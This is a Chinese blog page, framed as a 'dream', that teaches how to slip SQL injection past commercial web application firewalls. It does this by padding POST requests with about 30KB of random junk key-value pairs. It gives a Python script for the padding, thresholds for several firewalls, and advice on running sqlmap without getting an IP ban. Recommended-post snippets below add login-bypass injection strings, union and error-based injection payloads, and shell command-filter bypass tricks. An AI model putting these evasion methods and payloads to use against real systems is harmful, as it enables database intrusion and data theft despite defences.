sql注入语句万能密码_精华 | SQL注入万能Bypass技巧

最新推荐文章于 2024-05-11 22:44:48 发布
最新推荐文章于 2024-05-11 22:44:48 发布
阅读量438 收藏 1
点赞数
文章标签: sql注入语句万能密码

前言

很多同学问注入bypass的一些细节,刚好前几天晚上做了一个梦,梦里进行了一些测试,今天觉得应该记录一下。

本文纯属虚构,如有雷同纯属放屁。

正文

梦里发现了一处mssql报错注入

cdeac162480c0838b6d7f16f0ca28d02.png

然后发现有云锁

云锁.jpg(假装有图)

用自己写的的脚本生成垃圾数据

#coding=utf-8import random,stringfrom urllib import parse# code by yzddMr6varname_min = 5varname_max = 15data_min = 20data_max = 25num_min = 50num_max = 100def randstr(length):    str_list = [random.choice(string.ascii_letters) for i in range(length)]    random_str = ''.join(str_list)    return random_strdef main():    data={}    for i in range(num_min,num_max):        data[randstr(random.randint(varname_min,varname_max))]=randstr(random.randint(data_min,data_max))    print('&'+parse.urlencode(data)+'&')main()

如果是POST型就直接把垃圾数据放到你要注入的字段前后,如果是GET型就把他转为POST型再放垃圾数据。

88b2a4349f5a0de52b5ee4d4049cee54.png

第一次可能生成太少了,还是被云锁drop包

3bf6fa7d3730ec1ca3cc35e134cc1320.png

多粘贴几次,最后发现在数据包到30KB左右就可以正常注入了

509825d69b91a0b11a4cedf7e31ad14a.png

然后就可以查数据了

5efbca2b002898f70950c2cf7a5b9d40.png

测试数据

目前为止的bypass测试数据:

云锁:30KB宝塔:30KB阿里云:200+键值对安全狗没测过,有空测一下

建议先抓包手工试一下到底多少垃圾数据合适,没问题之后再上sqlmap,不然容易ban ip

回答几个问题

•为什么不直接在get上加垃圾数据?•因为GET型有长度限制,有时候还没加到能bypass的程度服务器就报错。

•为什么不用一个超长字符串要用这么多键值对?•因为经过测试,超长字符串对于阿里云没用,超多垃圾键值对才有用。

•适用类型有哪些?•在梦里的测试中本方法对于市面上绝大多数waf都可以用。

最后

然后梦就醒了,收拾一下准备去工地搬砖了。

a60c83197924c2307a19729c060be968.png

点赞,转发,在看

欢迎加入作者的知识星球

39609569940be6caf30604c350b2233e.png

weixin_39910481
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入Bypass安全狗4.0.pdf
04-08
SQL注入攻击是常见的Web应用安全漏洞之一,攻击者可以通过操纵SQL语句来访问或修改数据库中的数据。安全狗4.0是一款Web应用防火墙,可以检测和防止SQL注入攻击。但是,攻击者可以使用各种技术来绕过安全狗4.0的检测...
SQL_BypassWaf.pdf
04-08
SQL注入与WAF绕过】SQL注入是一种常见的网络安全攻击手法,通过在应用程序的输入字段中插入恶意SQL代码,以获取、修改、删除数据库中的数据。而WAF(Web Application Firewall)则是为了防止这种攻击而设立的一道...
SQL注入原理-POST注入
T1ngSh0w的博客
09-17 4829
SQL注入原理-POST注入
简述sql注入万能密码的原理
weixin_57108799的博客
02-17 876
sql万能密码原理
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
最新发布
2401_84973202的博客
05-11 1145
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
SQL注入闭合方式及万能密码
西电卢本伟的博客
03-24 2534
万能公式想到的...请求方式GET请求POST请求SQL注入闭合方式数字型字符型再看sqli-labs实验万能密码 请求方式 两种 HTTP 请求方法:GET 和 POST 在客户机和服务器之间进行请求-响应时,两种最常被用到的方法是:GET 和 POST。 ● GET - 从指定的资源请求数据。 ● POST - 向指定的资源提交要被处理的数据 GET请求 个人理解get请求其实就是通过URL来传递数据。 一个标准的URL网址,在最后有一个querystring部分,表示对页面查询,用?来表示这部分,内
常见sql注入语句和xss注入语句
小白博客
12-22 2841
1 and 1=1 或者1' and '1'='1 判断注入的类型 1 order by 1,2,3,4 数字类型为例;判断当前表存在多少个属性字段1' union select 1,table_name from information_schema.tables where table_schema=database()# 通过占位获取的数据库名 去MySQL的元数据表information_schema中查表名1' union select 1,c...
mysql 报错注入语句_MySQL注入(三)之报错
weixin_29957793的博客
02-01 207
MySQL注入(三)之报错SQL注入0x00 注入报错常见sql报错注入的函数及sql注入语句1、通过floor报错,注入语句如下:and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);2、通过ExtractValue报错...
第一节 SQL注入的原理-01
09-15
SQL注入是一种常见的Web应用安全漏洞,发生在Web应用程序使用用户输入数据构造SQL语句时,没有正确地对用户输入进行过滤和转义,导致攻击者可以 inject 恶意SQL代码,访问、修改或控制敏感数据。 解释型语言和编译...
aleenzz#MYSQL_SQL_BYPASS_WIKI#2-5-我与云锁有个约会1
07-25
以下内容都是把云锁的增强型防护开启简单的布尔盲注生僻函数绕过 这里比较难的点其实也在from,但是比云盾好点,毕竟可以用到注释看到这两条语句其实我们可以清楚的知
第十三节 SQL注入绕过技术-01
09-15
SQL 注入绕过技术指南 在 Web 应用程序中,SQL 注入攻击是最常见的安全漏洞之一。攻击者可以通过注入恶意 SQL 代码来访问或修改敏感数据。为了防止 SQL 注入攻击,开发者通常会对用户输入进行过滤和校验。但是,...
bypasswaf:关于安全狗和云锁的自动化绕过脚本
03-20
旁通 为避免非法用途而进行的学习 2.0:增加优化了部分规则现在bypass云锁篡改及bypass安全狗篡改支持所有的注入类型了!更新了bypass安全狗任意文件上传的方法(适用于业务系统存在的任何文件上传碎片但服务器安装了安全狗环境)更新了bypass安全狗SQL注入篡改,现在支持所有类型的注入了 针对最新版云锁和安全狗的sqlmap自动化绕过脚本 包含:绕过安全狗sql注入篡改绕过云锁SQL注入篡改(可0警告绕过云锁)理论上来说规则越多速度也会越慢所以不追求隐蔽性的可以按需求修改规则 针对最新版安全狗的任意文件上传bypass safedog_upload_yichu.txt safedog_upload_huanhang.txt 利用知识点: 安全狗:内联注释博客: : 云锁:引号包裹注释符绕过检测博客: : 云锁:多行注释符嵌入#绕过检测博客: : 文件上传:Conten
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
渗透小方法-万能密码+爆路径
Grey的博客
03-22 4104
网站后台万能密码/10大常用弱口令【脚本漏洞】所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。自己也有过收集,别人总结的我又添加了几个asp aspx万能密码1:”or “a”=”a2: ‘)or(‘a’=’a3:or 1=1–4:’or 1=1–5:a’or’ 1=1–6:”or 1=1–7:’or’a’=’a8:”or”=”a’...
’or 1=1# 初入SQL注入万能语句
weixin_41607190的博客
09-23 3万+
噢,终于知道CTF里面的那些SQL注入题里面,每题基本都有 id=1’ 这个东西,然后就是一串语句后面加个 # 。 现在终于理解了。至于这个东西为什么叫万能语句,继续看吧。 在介绍之前,先介绍一下我们一般的登陆过程: 输入用户名:“username” 输入密码:“password” 但我们输入完了以后是怎么登陆进去的呢?每个程序都会有一些验证机制。说一种简单的,比如下面这种代码: sql=&am...
2020-10-10
不二的博客
10-10 959
一:什么是sql注入   SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。 二:SQL注入攻击的总体思路    1:寻找到SQL注入的位置   2:判断服务器类型和后台数据库类型   3:针对不同的服务器和数据库特点进行SQL注入攻击 三:SQL注入攻击实例 String sql = "select * from user_table where username= ' "+us..
CTF中的Bypass命令执行
D.MIND 的博客
08-03 2485
linux命令敏感字符绕过 反斜杠: ca\t 1.txt 连接符——单引号: ca''t 1.txt 变量拼接字符: a=ca;b=t;$a$b 1.txt base64编码绕过: `echo 'Y2F0Cg==' | base64 -d` 1.txt 命令提示符$: ca$@t 1.txt //$@ 是传给脚本的所有参数的列表 ca$9t 1.txt //$9 是传递给该shell脚本的第九个参数 ...
SQL注入语句
热门推荐
大头的博客
07-25 3万+
一、SQL注入语句 账号:Admin 密码:123456 登录验证语句为select * from 表名 where UserName = '用户名' and UserPassword = '用户密码";的系统可通过以下注入方式可能可绕过密码登录进入系统。 1、 Admin' or '1'='1 123(任意密码) 注释:形成一个恒为真的条件,是SQL查询判断失败 2、 Admi...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值